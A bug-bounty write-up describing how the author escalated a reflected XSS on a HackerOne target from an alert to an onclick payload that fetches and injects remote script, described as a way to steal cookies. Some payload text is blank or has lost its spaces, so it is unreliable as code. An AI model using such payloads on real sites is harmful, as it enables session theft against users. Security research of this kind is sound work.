How i found RXSS in href Attribute

3 hours ago 6

mohaned alkhlot

Hello everyone, I will share how I found reflected XSS in a HackerOne program.

First, I discovered a page with an input field. I attempted a simple XSS payload like this:

<img src onerror=alert(1)>

Initially, this resulted in a self-XSS. I returned to the input field to find a way to make it a reflected XSS. I tried typing random words, but there were no parameters or anything visible in the URL.

Next, I attempted command injection by typing ls. Surprisingly, it navigated to a different page.

This indicated that a parameter was present in the URL. I tested further by inputting <test11>, but it showed that the < and > tags were not allowed.

Then, I tried using double quotes (“) instead. The input was reflected as is, along with a “Go back to Search” button. At this point, I focused on exploiting event handlers like onclick, onmouseup, and onmouseover.

I crafted this payload:


When I clicked the “Go back to Search” button, the XSS executed successfully. However, after clicking “OK” on the alert, the page redirected to the homepage.

To escalate the exploit, I attempted to inject a payload to steal cookies by using URL

first I try this payload

encoded version:{%20var%20script%20=%20document.createElement(%27script%27);%20script.innerHTML%20=%20text;%20document.body.appendChild(script);%20});

decoded version:"onclick="fetch('').then(response=>response.text()).then(text=>{varscript=document.createElement('script');script.innerHTML=text;document.body.appendChild(script);});

The problem was that clicking the “Go back to Search” button caused a redirect to the homepage before the XSS could execute. To prevent the redirect, I added return false; to the end of the payload. The final payload looked like this:"onclick="fetch('').then(response=>response.text()).then(text=>{varscript=document.createElement('script');script.innerHTML=text;document.body.appendChild(script);});returnfalse;

Now, when the victim clicked the button, the XSS executed without redirecting them.

Extra Tip: Sometimes, you need to URL-encode the URL for the payload to work properly.

and this is all, I hope you learned something new from this write-up!

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